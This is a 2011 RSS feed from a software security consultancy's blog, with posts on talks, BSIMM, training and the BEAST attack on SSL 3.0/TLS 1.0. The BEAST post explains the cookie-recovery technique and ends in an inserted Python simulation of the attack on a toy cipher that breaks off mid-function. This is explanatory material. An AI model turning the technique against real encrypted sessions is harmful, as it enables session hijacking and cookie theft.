<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Justice League Blog &#187; Software Security</title>
	<atom:link href="http://www.cigital.com/justice-league-blog/category/software-security/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cigital.com/justice-league-blog</link>
	<description></description>
	<lastBuildDate>Thu, 09 Feb 2012 19:09:48 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>2011 CTO Year in Review</title>
		<link>http://www.cigital.com/justice-league-blog/2011/12/07/2011-cto-year-in-review/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/12/07/2011-cto-year-in-review/#comments</comments>
		<pubDate>Wed, 07 Dec 2011 13:47:47 +0000</pubDate>
		<dc:creator>Cigital</dc:creator>
				<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justice-league-blog/?p=1028</guid>
		<description><![CDATA[Part of my job as software security pundit and &#8220;hood ornament&#8221; of Cigital is spreading the word about software security far and wide. 2011 was a year like many others in that respect. Here is a &#8220;tripometer&#8221; graph showing talks I give and trips I take each year going back a decade. The good news [...]]]></description>
			<content:encoded><![CDATA[<p>Part of my job as software security pundit and &#8220;hood ornament&#8221; of Cigital is spreading the word about software security far and wide.  2011 was a year like many others in that respect.  Here is a &#8220;tripometer&#8221; graph showing talks I give and trips I take each year going back a decade.</p>
<p align="center"><img src="http://www.cigital.com/justiceleague/wp-content/uploads/2011/12/trips2011.png" alt="" title="trips2011" width="450" height="351" class="alignnone size-full wp-image-1039" /></p>
<p>The good news from my perspective is that talks are up (clocking in at 40) even while trips are down (coming in at 27).  Those are the kinds of trends I can live with.</p>
<p>I gave nine keynote talks this year to large audiences.  They included:</p>
<ul>
<li><em>Software Security and the BSIMM</em>, Fannie Mae CSO Security Summit (Washington, DC)</li>
<li><em>Architecture Risk Analysis</em>, RSA Innovation Sandbox (San Francisco, CA)</li>
<li><a href="http://www.htng.org/events/nammc/2011/agenda_detailed.htm"><em>How Do I Secure my Software?</em></a>, Hotel Technology Next Generation (San Diego, CA)</li>
<li><em>Software Security: State of the Practice</em>, SAP Quality Day (Heidelberg, Germany)</li>
<li><a href="http://www.computer.org/portal/web/computingnow/sw/ses11?utm_source=bronto&#038;utm_medium=email&#038;utm_term=Get+Inspired+and+Motivated+by+Top+Software+Industry+Professionals&#038;utm_content=gem%40cigital.com&#038;utm_campaign=BYC+21+March%2C+2011"><em>Software Security and the BSIMM</em></a>, Software Experts Summit (Mountain View, CA)</li>
<li><a href="http://www.ares-conference.eu/conf/"><em>Software Security and the BSIMM</em></a>, ARES (Vienna, Austria)</li>
<li><em>Attack Trends 2012</em>, SNI Security Summit (Knoxville, TN)</li>
<li><em>Attack Trends 2012</em>, Automated Control Systems Security (Washington, DC)</li>
<li><em>The Building Security In Maturity Model</em>, NESSOS, Internet Days EU (Poznan, Poland)</li>
</ul>
<p>I also gave talks at thirteen universities, including UVa, Harvard, UMass, NCSU, Georgetown, the Naval Postgraduate School, JHU, UMD, Northern Kentucky University, Columbia, Indiana University, JMU, and UC Santa Barbara.  It is always a blast to interact with students.  They seem to get younger every year.</p>
<p>If you have a speaking opportunity for us, we would love to hear from you!  Cigital has a bunch of very talented speakers.</p>
<p>My monthly column for informIT continues apace into its fifth year.  Here is a listing of the last 12 articles in the series (still working on December&#8217;s).  I think my favorite one is the Zombies paper…that one should live on for a while.</p>
<ul>
<li><a href="http://www.informit.com/articles/article.aspx?p=1809143">Third-Party Software and Security</a> (November 30, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1767770">Software Security Training</a> (October 31, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1755416">BSIMM3</a> (September 27, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1750195">Balancing All the Breaking with some Building</a> (August 30, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1739924">Software Security Zombies</a> (July 21, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1719778">Computer Security and International Norms</a> (May 30, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1703668">vBSIMM (BSIMM for Vendors)</a> (April 12, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1695979">Modern Malware</a> (March 22, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1687636">Software Patents and Fault Injection</a> (February 28, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1680863">Comparing Apples, Oranges, and Aardvarks (or, All Static Analysis Tools Are Not Created Equal)</a> (January 31, 2011)</li>
<li><a href="http://www.informit.com/articles/article.aspx?p=1671924">Driving Efficiency and Effectiveness in Software Security</a> (December 29, 2010)</li>
</ul>
<p>My 2011 writing also included interaction with the Washington D.C. policy wonks at the <a href="http://www.cnas.org/">Center for a New American Security</a>.  CNAS ran a study on cyber security for policymakers.  CNAS CEO and Iraq War author <a href="http://www.amazon.com/One-Bullet-Away-Making-Officer/dp/B002ECETVS/ref=sr_1_1?s=books&#038;ie=UTF8&#038;qid=1323271797&#038;sr=1-1">Nate Fick</a> co-authored a paper with me meant to inform lawmakers about what cyber security really should be: <a href="http://www.cigital.com/papers/download/mcgraw-fick-CNAS.pdf">Separating the Threat from the Hype: What Washington Needs to Know About Cyber Security in AMERICA&#8217;S CYBER FUTURE: SECURITY AND PROSPERITY IN THE INFORMATION AGE VOLUMES I AND II, Center for a New American Security</a> [PDF] (June 2011).</p>
<p>With the <a href="http://www.forbes.com/sites/andygreenberg/2010/08/18/hps-fortify-buyout-numbers-tell-lucrative-story-for-software-security/?boxes=Homepagechannels">purchase of Fortify Software by HP at the end of 2010</a>, a long and very successful technology transfer path was completed.  From our invention of security scanning in the labs at Cigital, through Kleiner-Perkins, to worldwide distribution through HP, code review for security is here to stay.  I wrote the story up in <em>IEEE Software</em>: <a href="http://www.cigital.com/papers/download/09-11_Software0511.pdf">Technology Transfer: A Software Security Marketplace Case Study</a> [PDF] (September/October 2011).</p>
<p>And there is always the Silver Bullet security podcast.  The last 12 interviews included some really solid episodes.  I think my favorite this year was an <a href="/silverbullet/show-059/">in-depth interview with Ralph Langner</a> about Stuxnet.  Ralph is the guy who discovered that the payload was aimed at Siemens control systems.</p>
<ol start="58">
<li><a href="/silverbullet/show-058/">John Savage</a></li>
<li><a href="/silverbullet/show-059/">Ralph Langner</a></li>
<li><a href="/silverbullet/show-060/">Neil Daswani</a></li>
<li><a href="/silverbullet/show-061/">Carl Landwehr</a></li>
<li><a href="/silverbullet/show-062/">Halvar Flake</a></li>
<li><a href="/silverbullet/show-063/">Craig Miller</a></li>
<li><a href="/silverbullet/show-064/">Markus Schumacher</a></li>
<li><a href="/silverbullet/show-065/">Giovanni Vigna</a></li>
<li><a href="/silverbullet/show-066/">Shari Lawrence Pfleeger</a></li>
<li><a href="/silverbullet/show-067/">Bill Pugh</a></li>
<li><a href="/silverbullet/show-068/">John Steven</a></li>
</ol>
<p>2012 should look much the same when it comes to trips and talks, though one of these years I need to find the time to write another book!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/12/07/2011-cto-year-in-review/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>UK Spooks&#8217; Recruiting Tactic: Very Low Pound to Genius Ratio</title>
		<link>http://www.cigital.com/justice-league-blog/2011/12/02/uk-spooks-recruiting-tactic-very-low-pound-to-genius-ratio/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/12/02/uk-spooks-recruiting-tactic-very-low-pound-to-genius-ratio/#comments</comments>
		<pubDate>Fri, 02 Dec 2011 16:29:08 +0000</pubDate>
		<dc:creator>Cigital</dc:creator>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justice-league-blog/?p=1022</guid>
		<description><![CDATA[(This is a guest post by Adam Zabrocki, a consultant at Cigital.) The UK intelligence agency, GCHQ, (roughly analogous to the US&#8217;s NSA) posted an online challenge recently at http://canyoucrackit.co.uk/ (read more). Given essentially no information other than what are pretty obviously hex digits, candidates are invited to attempt to &#8220;crack&#8221; an opaque puzzle. It [...]]]></description>
			<content:encoded><![CDATA[<p><em>(This is a guest post by Adam Zabrocki, a consultant at Cigital.)</em></p>
<p>The UK intelligence agency, GCHQ, (roughly analogous to the US&#8217;s NSA) posted an online challenge recently at <a href="http://canyoucrackit.co.uk/">http://canyoucrackit.co.uk/</a> (<a href="http://www.dailymail.co.uk/sciencetech/article-2068452/GCHQ-launches-online-code-cracking-puzzle-recruit-cyber-savvy-spies-future.html">read more</a>). Given essentially no information other than what are pretty obviously hex digits, candidates are invited to attempt to &#8220;crack&#8221; an opaque puzzle. It isn&#8217;t even clear what the puzzle is (is it an encrypted document? is it a program? Is it a virus?).</p>
<p>Ostensibly the puzzle will help GCHQ identify very clever candidates to come work at the agency, fighting the good fight in cyberwarfare. Other high-profile companies have tried similar strategies in the past (like <a href="http://mathworld.wolfram.com/news/2004-10-13/google/">Google</a> and Microsoft) to find highly qualified candidates.</p>
<p>The puzzle requires unraveling x86 instructions, finding a few bits of essential data hidden steganographically in the image itself, and putting it all together into a program that reveals a final URL to visit. The skills required to do this are similar to those required for reverse engineering unknown malware and trying to figure out what it does&#8211;especially when only part of it is present. It&#8217;s part systematic sleuthing, part guesswork, and part forensics.</p>
<p>As the UK, the US, and many other wealthy nations attempt to build their defences against cybercrime (and cyberwar), they are trying to identify good guys who have what it takes to understand what the bad guys do. It&#8217;s great fun to solve a problem like this, and it&#8217;s great fun to imagine doing that for a living to serve your country. But when you discover that the government&#8217;s salary is a fraction of the salary of being a private-sector good guy (not to mention what the bad guys might make), it&#8217;s no wonder they are struggling to find recruits.</p>
<p>The details of how I solved it are on <a href="http://blog.pi3.com.pl/?p=213">my personal blog</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/12/02/uk-spooks-recruiting-tactic-very-low-pound-to-genius-ratio/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Third-Party Software, Vendor Control, and the BSIMM Community</title>
		<link>http://www.cigital.com/justice-league-blog/2011/11/30/third-party-software-vendor-control-and-the-bsimm-community/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/11/30/third-party-software-vendor-control-and-the-bsimm-community/#comments</comments>
		<pubDate>Wed, 30 Nov 2011 21:36:20 +0000</pubDate>
		<dc:creator>gem</dc:creator>
				<category><![CDATA[BSIMM]]></category>
		<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=1019</guid>
		<description><![CDATA[Cigital recently hosted a second BSIMM Community Conference near Portland, Oregon. The Conference was outstanding, and was a great opportunity for like-minded software security professionals to compare notes. Firms participating in the BSIMM include: Adobe Aon Bank of America Capital One The Depository Trust &#38; Clearing Corporation (DTCC) EMC Fannie Mae Fidelity Google Intel Intuit [...]]]></description>
			<content:encoded><![CDATA[<p>Cigital recently hosted a second BSIMM Community Conference near Portland, Oregon.  The Conference was outstanding, and was a great opportunity for like-minded software security professionals to compare notes.  Firms participating in the BSIMM include: </p>
<div style="width: 450px;margin: auto">
<div style="float: left">
<ul>
<li>Adobe</li>
<li>Aon</li>
<li>Bank of America</li>
<li>Capital One</li>
<li>The Depository Trust &amp;<br />
          Clearing Corporation (DTCC)</li>
<li>EMC</li>
<li>Fannie Mae</li>
<li>Fidelity</li>
<li>Google</li>
</ul>
</div>
<div style="float: left">
<ul>
<li>Intel</li>
<li>Intuit</li>
<li>Mashery</li>
<li>McKesson</li>
<li>Microsoft</li>
<li>Nokia</li>
<li>QUALCOMM</li>
<li>Sallie Mae</li>
<li>SAP</li>
<li>Scripps Networks Interactive</li>
</ul>
</div>
<div style="clear: both;float: left">
<ul>
<li>Sony Ericsson</li>
<li>Standard Life</li>
<li>SWIFT</li>
<li>Symantec</li>
<li>Telecom Italia</li>
<li>Thomson Reuters</li>
<li>Visa</li>
<li>VMware</li>
<li>Wells Fargo</li>
<li>Zynga</li>
</ul>
</div>
</div>
<div style="clear: both"></div>
<p>The BSIMM project describes and measures the work of 786 SSG members, who together with a satellite of 1750 people, have direct impact on the work of 185,316 developers.  (<a href="http://bsimm.com/download/">Download a copy today</a> and <a href="http://bsimm.com/community/">get your firm involved</a> in the BSIMM Project.)</p>
<p>The BSIMM is mostly about SSDL activities and governance.  However, third-party software plays a major role in all of the BSIMM firms and is an important risk factor that must be managed.  In addition to talks from member firms, the BSIMM Community Conference also featured a workshop on third-party software and security.</p>
<p>Sammy, Brian, and I wrote up the results in an <a href="http://www.informit.com/articles/article.aspx?p=1809143">informIT article</a> that was posted today.</p>
<p>The interesting aspect of our workshop was that it was made up of approximately 50% software vendors and 50% financial services firms.  This made for a very interesting conversation around vendor control. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/11/30/third-party-software-vendor-control-and-the-bsimm-community/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Training by the Numbers</title>
		<link>http://www.cigital.com/justice-league-blog/2011/11/07/training-by-the-numbers/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/11/07/training-by-the-numbers/#comments</comments>
		<pubDate>Mon, 07 Nov 2011 20:18:35 +0000</pubDate>
		<dc:creator>sammy</dc:creator>
				<category><![CDATA[Software Security]]></category>
		<category><![CDATA[Training]]></category>
		<category><![CDATA[software security training]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=968</guid>
		<description><![CDATA[1992: Cigital (then Reliable Software Technologies) gets started and also delivers some training on software quality “a few hundred”: ILT days delivered from 1992 through 2006 5,000: ILT students trained from 1992 through 2006 575: ILT and tutorial days delivered from 2007 through today 9,000: ILT students trained from 2007 through today 100,000: current students [...]]]></description>
			<content:encoded><![CDATA[<ul>
<li><strong>1992:</strong> Cigital (then Reliable Software Technologies) gets started and also delivers some training on software quality</li>
<li><strong>“a few hundred”:</strong> ILT days delivered from 1992 through 2006</li>
<li><strong>5,000:</strong> ILT students trained from 1992 through 2006</li>
<li><strong>575:</strong> ILT and tutorial days delivered from 2007 through today</li>
<li><strong>9,000:</strong> ILT students trained from 2007 through today</li>
<li><strong>100,000:</strong> current students with access to our eLearning</li>
</ul>
<p>Here are those numbers again in the context of a few things we’ve learned:</p>
<p>Cigital has always included instructor-led training (ILT) as part of its knowledge transfer to clients. From our founding in 1992 through 2006, we trained an estimated 5000 students on various aspects of software quality and software security.  This was done in only “a few hundred” sessions. In addition, from the launch of our formal training offerings in January 2007 through September 2011, we delivered approximately 525 ILT days to over 7700 students. Throw in “about 50” conference tutorial sessions and other non-client-specific training sessions (but not normal conference talks or similar things) and the student number grows to about 9000, for a total of about 14,000.</p>
<p>There has been some shift in demand over that time. For the first 10 years or so, everything was custom. We typically spent weeks and even months building training that was very specific to platforms, frameworks, coding standards, policies, and even specific problems-of-the-day. This training was usually for relatively small numbers of people all working on something very similar. For the firm, that becomes a very expensive proposition when you get to hundreds or even thousands of developers working in multiple technologies, stacks, languages, tools, and related items. There simply isn’t enough time or dollars to make custom training for everyone.</p>
<p>Starting in 2006, we saw a real market demand for more standardized software security training (as differentiated from the plethora of network security, tool-specific, and generic “security” training in the marketplace, or the deep-dive, single-topic courses for things like reversing malware or DLL hooking). This demand was and continues to be much more centered on foundational training for all SDLC stakeholders (business analysts, architects, developers, quality testers, pen testers, audit, risk/compliance, and so on) and advanced training for small groups (e.g., lead architects and developers).</p>
<p>From early 2007 through October 2011, Cigital also deployed eLearning to firms that represent over 100,000 students who are developers, architects, testers, managers, business analysts, security operations folks, and others. The majority of clients are using our eLearning in their internal learning management systems for access by employees as well as contractors integrated into the client’s ecosystem. For external contractors without access to internal client systems, clients are using our training portal.</p>
<p>There has been a shift in the eLearning landscape as well.</p>
<ul>
<li>We see almost all large firms having their own learning management system and wanting to take our material in-house. Meanwhile, smaller firms are looking to outsource everything and simply purchase access to our LMS for a given number of seats.</li>
<li>There is a growing demand for tightly-focused topical modules that can be consumed in an hour or less.</li>
<li>There was an initial demand for custom eLearning and then off-the-shelf became all the rage as the economy changed.</li>
<li>There’s a trend toward moving training closer to the activity. For example, inserting some defensive programming training directly into the developer’s IDE. We’ve actually developed plug-in technology for this one.</li>
<li>As everyone sees the possibilities represented by more advanced instructional design, there is an increasing demand for what can only be described as virtual reality and flying monkeys with every image and word indexed and a holographic interface that instantly takes the student to the exact second in the module that answers with cut-and-paste content whatever question the student is pondering. Oh, and it needs to run on any device from laptops to smart phones to microwaves and in-dash satellite radios. Of course, we’re all over this, too.</li>
</ul>
<p>As an off-shoot of our continuing BSIMM activities, Gary and I also recently wrote an <a href="http://www.informit.com/articles/article.aspx?p=1767770">article on software security training</a>. Here are some additional thoughts.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/11/07/training-by-the-numbers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cigital helps to create cyber security plans</title>
		<link>http://www.cigital.com/justice-league-blog/2011/10/11/cigital-helps-to-create-cyber-security-plans/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/10/11/cigital-helps-to-create-cyber-security-plans/#comments</comments>
		<pubDate>Tue, 11 Oct 2011 18:59:32 +0000</pubDate>
		<dc:creator>Cigital</dc:creator>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=959</guid>
		<description><![CDATA[(This is a guest post by Evgeny Lebanidze, a managing consultant at Cigital.) Cigital has been working one-on-one with Rural Electric Co-ops across the US to help them raise their cyber security bar, starting with the creation of their own custom cyber security plan. To facilitate this process, Cigital provided the Co-ops with several artifacts, [...]]]></description>
			<content:encoded><![CDATA[<p><em>(This is a guest post by Evgeny Lebanidze, a managing consultant at Cigital.)</em></p>
<p>Cigital has been working one-on-one with Rural Electric Co-ops across the US to help them raise their cyber security bar, starting with the creation of their own custom cyber security plan.  To facilitate this process, Cigital provided the Co-ops with several artifacts, including a <a href="http://www.cigital.com/news/index.php?pg=art&amp;artid=179">Guide to Developing a Cyber Security and Risk Mitigation Plan</a> and an associated Cyber Security Plan Template, developed by Cigital for the National Rural Electric Cooperative Association (NRECA).  The following video captures testimonials from Rural Electric Co-ops that have worked with Cigital to create their cyber security plans, along with feedback from industry experts and practitioners on the cyber security risk management approach and toolkit developed by Cigital.</p>
<p align="center"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="480"  height="270"  id="V2Player"><param name="allowScriptAccess" value="sameDomain" /><param name="allowFullScreen" value="true" /><param name="movie" value="http://http.vitalstreamcdn.com/flashskins/V2Player.swf" /><param name="quality" value="high" /><param name="flashvars"  value="stream1=CRN/CRN_cybersecurity_3.1&#038;serverAppInstName=rtmp://nreca.flash.internapcdn.net/nreca_vitalstream_com/_definst_&#038;debug=false" /><embed src="http://http.vitalstreamcdn.com/flashskins/V2Player.swf"  flashvars="stream1=CRN/CRN_cybersecurity_3.1&#038;serverAppInstName=rtmp://nreca.flash.internapcdn.net/nreca_vitalstream_com/_definst_&#038;debug=false"  quality="high"  width="480"  height="270"  name="V2Player"  allowScriptAccess="sameDomain"  allowFullScreen="true"  type="application/x-shockwave-flash"  pluginspage="http://www.macromedia.com/go/getflashplayer" /><br />
</object></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/10/11/cigital-helps-to-create-cyber-security-plans/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Announcing BSIMM3</title>
		<link>http://www.cigital.com/justice-league-blog/2011/09/27/announcing-bsimm3/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/09/27/announcing-bsimm3/#comments</comments>
		<pubDate>Tue, 27 Sep 2011 12:30:56 +0000</pubDate>
		<dc:creator>sammy</dc:creator>
				<category><![CDATA[BSIMM]]></category>
		<category><![CDATA[Software Security]]></category>
		<category><![CDATA[bsimm]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=956</guid>
		<description><![CDATA[We announced BSIMM in March 2009 and BSIMM2 in May 2010. It’s now time for BSIMM3. Long live the BSIMM. Since the first BSIMM interview in October 2008, we’ve progressed from nine to 30 to 42 firms (and more, at this point). We’ve also measured 11 firms twice—about 19 months between measurements on average—and that [...]]]></description>
			<content:encoded><![CDATA[<p>We announced BSIMM in March 2009 and BSIMM2 in May 2010. It’s now time for BSIMM3. Long live the BSIMM.</p>
<p>Since the first BSIMM interview in October 2008, we’ve progressed from nine to 30 to 42 firms (and more, at this point). We’ve also measured 11 firms twice—about 19 months between measurements on average—and that has provided the BSIMM community with some unique insight on how software security initiatives change over time. Assessing 42 individual firms and performing 11 re-assessments required 81 sets of interviews in just a shade less than three years.</p>
<p>For my money, that’s not bad for a backyard project.</p>
<p>Of the 42 firms in the data pool, 27 have graciously allowed us to name them as BSIMM participants. They are: Adobe, Aon, Bank of America, Capital One, The Depository Trust &amp; Clearing Corporation (DTCC), EMC, Fannie Mae, Google, Intel, Intuit, McKesson, Microsoft, Nokia, QUALCOMM, Sallie Mae, SAP, Scripps Networks Interactive, Sony Ericsson, Standard Life, SWIFT, Symantec, Telecom Italia, Thomson Reuters, Visa, VMware, Wells Fargo, and Zynga. To these and the other 15 firms, thank you very much for participating. You are directly responsible for advancing the cause of software security.</p>
<p>The BSIMM3 document is freely available under a Creative Commons license. You can get it from <a href="http://bsimm.com">http://bsimm.com</a>. Go ahead; it’s a good read. Even if you’re down the road with your software security initiative, you can get a glimpse into the actual software security activities conducted by your peers and competitors. If you’ve yet to get started, BSIMM will give you some great ideas.</p>
<p>As always, we are looking for more people who are interested in participating in the BSIMM study. We’d love to hear from you.</p>
<p>&#8211;Sammy.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cigital.com/justice-league-blog/2011/09/27/announcing-bsimm3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BEAST and SSL/TLS</title>
		<link>http://www.cigital.com/justice-league-blog/2011/09/26/beast-and-ssltls/</link>
		<comments>http://www.cigital.com/justice-league-blog/2011/09/26/beast-and-ssltls/#comments</comments>
		<pubDate>Mon, 26 Sep 2011 15:02:59 +0000</pubDate>
		<dc:creator>Cigital</dc:creator>
				<category><![CDATA[Defects, Bugs, and Flaws]]></category>
		<category><![CDATA[Software Security]]></category>

		<guid isPermaLink="false">http://www.cigital.com/justiceleague/?p=950</guid>
		<description><![CDATA[This is a guest post by Amit Sethi, Technical Manager at Cigital. There has been a lot of talk about BEAST (Browser Exploit Against SSL/TLS) lately. The attack against SSL 3.0 / TLS 1.0 was recently publicized by Thai Duong and Juliano Rizzo. Do you know what the risks are, and how to protect yourself? [...]]]></description>
			<content:encoded><![CDATA[<p><em>This is a guest post by Amit Sethi, Technical Manager at Cigital.</em></p>
<p>There has been a lot of talk about BEAST (Browser Exploit Against SSL/TLS) lately. The attack against SSL 3.0 / TLS 1.0 was recently publicized by Thai Duong and Juliano Rizzo. Do you know what the risks are, and how to protect yourself?</p>
<p><strong>How does it work?</strong></p>
<p>The attack has two components, and the goal is for the attacker to get your cookie so that he can hijack your session:</p>
<ul>
<li>Some client-side code (Java applet, Silverlight application, etc.) that is injected into a page delivered over HTTP that can make requests to a site that uses HTTPS. This may require bypassing (or finding loopholes in) same-origin security policies.</li>
<li>A sniffer on the network that the victim is on, to record encrypted data generated by the client-side code. The sniffer and the client-side code need to communicate with each other for the attack to work.</li>
</ul>
<p>The easiest way to carry out this attack is over a public Wi-Fi network; however, attackers on other types of networks, including wired networks, can also do this. The main requirement is that the attacker and the victim need to be on the same LAN. The attacker will need to conduct a man-in-the-middle attack to inject malicious code into an HTTP page that can make requests to the targeted HTTPS site. This attack only works if the HTTPS connection is established using SSL 3.0 or TLS 1.0 and a block cipher (e.g. 3DES or AES) in CBC mode is chosen. Unfortunately, most HTTPS sites currently support only SSL 3.0 and TLS 1.0, and prefer using block ciphers in CBC mode.</p>
<p><strong>Some technical details</strong></p>
<p>The main techniques used by the attack are described below. Feel free to skip this section if you don’t care about the technical details.</p>
<ul>
<li>Some types of client-side code (Java applets, Silverlight applications, etc.) have the ability to send partial HTTPS requests. They keep the SSL/TLS connection open, and send data as it becomes available. With SSL 3.0 / TLS 1.0, no new random initialization vector is generated each time a new block of data is sent; the data is simply appended to the previous stream, so the last ciphertext block of one record serves as the IV for the next. An attacker who sees the last ciphertext block and can control the next plaintext block can gain complete control over the next ciphertext block (this is a consequence of how CBC mode works).</li>
<li>Since HTTP headers preceding cookie headers are predictable and can be obtained by an attacker who sniffs a single HTTP request from the victim, and since the attacker can control the URL of requests, he can control exactly where the cookie header’s bytes end up in relation to ciphertext block boundaries.</li>
<li>If an attacker knows the previous block of ciphertext and can completely control the next block of plaintext, he can determine whether a previously seen block of ciphertext corresponded to a given block of plaintext. Let’s assume that the attacker wants to determine whether the plaintext, <em>P<sub>i</sub></em>, for a previously seen block of ciphertext, <em>C<sub>i</sub></em>, was <em>x</em>. Now, the attacker knows <em>C<sub>j-1</sub></em>, the last block of ciphertext, and wants to set <em>P<sub>j</sub></em>, the next block of plaintext to be encrypted, to a value that helps him determine whether <em>P<sub>i</sub></em> was equal to <em>x</em>. If he sets <em>P<sub>j</sub></em> = <em>C<sub>j-1</sub></em> &#x2295; <em>C<sub>i-1</sub></em> &#x2295; <em>x</em> (note that <em>C<sub>j-1</sub></em> and <em>C<sub>i-1</sub></em> are sniffed from the network, and <em>x</em> is the attacker’s guess), and <em>P<sub>i</sub></em> was indeed equal to <em>x</em>, then <em>C<sub>j</sub></em> = E(<em>C<sub>j-1</sub></em> &#x2295; <em>P<sub>j</sub></em>) = E(<em>C<sub>j-1</sub></em> &#x2295; <em>C<sub>j-1</sub></em> &#x2295; <em>C<sub>i-1</sub></em> &#x2295; <em>x</em>) = E(<em>C<sub>i-1</sub></em> &#x2295; <em>x</em>) = E(<em>C<sub>i-1</sub></em> &#x2295; <em>P<sub>i</sub></em>) = <em>C<sub>i</sub></em>. Therefore, if the attacker’s guess is correct, then the next block of ciphertext, <em>C<sub>j</sub></em>, will equal the previously seen block of ciphertext, <em>C<sub>i</sub></em>.</li>
</ul>
<p>Given the above details, let’s say that an attacker makes a request to /AAAAAAAAAA, and knows that it will result in a block of ciphertext containing exactly eight bytes of the cookie header: “ookie: x” (this is realistic if a 3DES cipher suite is used, since 3DES has an 8-byte block). The first seven bytes of that block are known, so the attacker can make all 256 possible guesses for x and determine the first byte of the cookie value. Next, the attacker makes a new HTTP request to /AAAAAAAAA (one less A, which shifts the cookie header one position to the left so that the ciphertext block now covers “okie: xy”) and, knowing x, guesses y. The attacker continues in this manner until he has recovered all bytes of the cookie. In reality, there are far fewer than 256 possibilities for each byte of the cookie header (cookie values are usually drawn from a small printable alphabet), so the attack requires less work. There are also several details required for the attack to work that are omitted here.</p>
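<p>The byte-at-a-time procedure above, as an added simulation that is not part of the original post. A four-round Feistel toy cipher stands in for 3DES (it is a keyed permutation on 8-byte blocks, which is all CBC needs, and it is not a secure cipher); the session object models TLS 1.0’s chained IVs with padding and MAC omitted; the cookie value, key and IV are constructed for the demo. The attacker function uses only what BEAST really has: sniffed ciphertext, control of the request path, and the ability to send fully chosen records on the same connection.</p>

```python
import hashlib
from typing import List

BLOCK = 8  # 8-byte blocks, matching the 3DES suites discussed above


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Four-round Feistel network: a keyed permutation on 8-byte blocks.
    It stands in for 3DES only to show the CBC structure; it is NOT secure."""
    assert len(block) == BLOCK
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        left, right = right, xor(left, _round_fn(key, rnd, right))
    return left + right


class Tls10CbcSession:
    """One direction of a TLS 1.0 connection: CBC where the IV of each record
    is the last ciphertext block of the previous record (chained IVs)."""

    def __init__(self, key: bytes, iv: bytes):
        self.key = key
        self.prev = iv  # initial IV; afterwards the last ciphertext block sent

    def send_record(self, plaintext: bytes) -> List[bytes]:
        blocks = []
        for off in range(0, len(plaintext), BLOCK):
            chunk = plaintext[off:off + BLOCK].ljust(BLOCK, b"\x00")
            cipher_block = toy_block_encrypt(self.key, xor(self.prev, chunk))
            blocks.append(cipher_block)
            self.prev = cipher_block
        return blocks


HEAD = b"GET "
TAIL = b" HTTP/1.1\r\n"
SECRET_COOKIE = b"Cookie: sid=7f3a9c"  # constructed sample secret


class VictimBrowser:
    """The attacker picks the request path (e.g. from an applet); the browser
    appends the secret cookie header itself and encrypts the whole record."""

    def __init__(self, session: Tls10CbcSession, secret: bytes):
        self.session, self.secret = session, secret

    def request(self, path: bytes) -> List[bytes]:
        return self.session.send_record(HEAD + path + TAIL + self.secret)

    def send_controlled(self, data: bytes) -> List[bytes]:
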